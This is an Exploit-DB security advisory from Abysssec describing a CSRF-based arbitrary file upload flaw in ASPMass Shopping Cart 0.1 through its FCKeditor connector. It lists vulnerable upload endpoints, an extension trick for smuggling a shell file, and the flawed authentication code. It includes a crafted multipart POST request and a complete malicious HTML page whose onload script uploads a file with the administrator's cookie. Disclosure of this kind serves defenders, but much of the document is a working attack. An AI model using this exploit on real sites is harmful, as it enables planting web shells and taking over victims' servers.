ASPMass Shopping Cart - Arbitrary File Upload / Cross-Site Request Forgery

EDB-ID:

15160

CVE:

N/A


Author:

Abysssec

Type:

webapps


Platform:

ASP

Date:

2010-09-30


'''
  __  __  ____         _    _ ____  
 |  \/  |/ __ \   /\  | |  | |  _ \ 
 | \  / | |  | | /  \ | |  | | |_) |
 | |\/| | |  | |/ /\ \| |  | |  _ < 
 | |  | | |__| / ____ \ |__| | |_) |
 |_|  |_|\____/_/    \_\____/|____/ 

http://www.exploit-db.com/moaub-30-aspmass-shopping-cart-vulnerability-file-upload-csrf/
'''

Abysssec Inc Public Advisory
 
 
  Title            :  ASPMass Shopping Cart Vulnerability File Upload CSRF
  Affected Version :  ASPMass Shopping Cart 0.1
  Discovery        :  www.abysssec.com
  Vendor	   :  http://www.aspmass.com/
  Demo  	   :  http://www.aspmass.com/demo.htm
  Admin Page       :  http://Example.com/Admin/Login.aspx
  
 
Description :
===========================================================================================      
  This version of ASP Shopping Cart has CSRF vulnerability for upload a file with fckEditor.
  But we have two limitation :

     1- We need Admin's Cookie  
     2- Specific file extension implementing by FckEditor v2 and bypassing this barrier is on you.
        For example the file with this extension shell.aspx;me.xml
        will be upload with this extension :     shell_aspx;me.xml


  you can upload your file with this paths: (of course with CSRF)
     http://Example.com/Images/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=File
     http://Example.com/Images/js/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=FileUpload&Type=File&CurrentFolder=/
     http://Example.com/Images/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?time=1280125833981&Type=File&CurrentFolder=/
     http://Example.com/Images/js/fckeditor/editor/filemanager/connectors/test.html
     http://Example.com/Images/js/fckeditor/editor/filemanager/connectors/uploadtest.html  


  Uploaded files will be placing in this path:

     .../Files/site/file/
     .../Files/site/flash/
     .../Files/site/image/
     .../Files/site/media/
        
   
  vulnerable Code:
     The misconfiguration is in ...\Images\js\fcKeditor\editor\filemanager\connectors\aspx\config.ascx  
     ln 40:
              private bool CheckAuthentication()
	      {	
        	if (Session["AdminLogedIn"] == "Yes")
       		{
            		return true;
       		}
        	else
        	{
            		return false;
       		}
	      }
              

   For example you can feed this POST Request to Admin :

    ----------------------------------------------------------------------------------------
    POST http://Example.com/Images/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=File&CurrentFolder=/ HTTP/1.1
    Host: Example.com
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-us,en;q=0.5
    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
    Keep-Alive: 300
    Proxy-Connection: keep-alive  
    Referer: http://Example.com/Images/js/fckeditor/editor/filemanager/connectors/uploadtest.html
    Cookie: ASP.NET_SessionId=ejskxhea4eqnkirsbxebj145
    Content-Type: multipart/form-data; boundary=---------------------------92203111132182
    Content-Length: 198


    -----------------------------92203111132182
    Content-Disposition: form-data; name="NewFile"; filename="Test.xml"
    Content-Type: text/plain

    This is a shell...
    -----------------------------92203111132182--
    
    With this POST Request, the file Test.xml uploads i this path:
       .../Files/site/


The Source of HTML Page Malicious Link) 
===========================================================================================     
  With this page, we send a request with AJAX to upload a file with Admin's Cookie.
  

<html>
<head>
<title >Wellcome to ASP Shopping Cart!</title>
Hello!
...
...
...
This page uploads a file with "xml" extension

<script>
    
    var binary;
    var filename;       
    
    function FileUpload() {                 
        try {
            netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect");
        } catch (e) {
        }

        var http = false;        
        if (window.XMLHttpRequest) {                               
            http = new XMLHttpRequest();            
        }
        else if (window.ActiveXObject) {        
            http = new ActiveXObject("Microsoft.XMLHTTP"); 
        }

        var url = "http://Example.com/Images/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=File&CurrentFolder=/";
        var filename = 'Test.xml';
        var filetext = ' This is a shell ... ';

        var boundaryString = '---------------------------92203111132182';
        var boundary = '--' + boundaryString;
        var requestbody = boundary + '\n'
	    + 'Content-Disposition: form-data; name="NewFile"; filename="' 
	    + filename + '"' + '\n'
            + 'Content-Type: text/plain' + '\n'
	    + '\n'
	    + filetext 	        
	    + '\n'
	    + boundary;
        
        http.onreadystatechange = done;
        http.open('POST', url, true);
        
        http.setRequestHeader("Content-type", "multipart/form-data; boundary=" + boundaryString);        
        http.setRequestHeader("Connection", "close");
        http.setRequestHeader("Content-length", requestbody.length);
        http.send(requestbody);
        }
        function done() {
            if (http.readyState == 4 && http.status == 200) {
                //alert(http.responseText);
                //alert('Upload OK');
            }            
        }             
</script>
</head>
<body onload ="FileUpload();">
</body>
</html>

===========================================================================================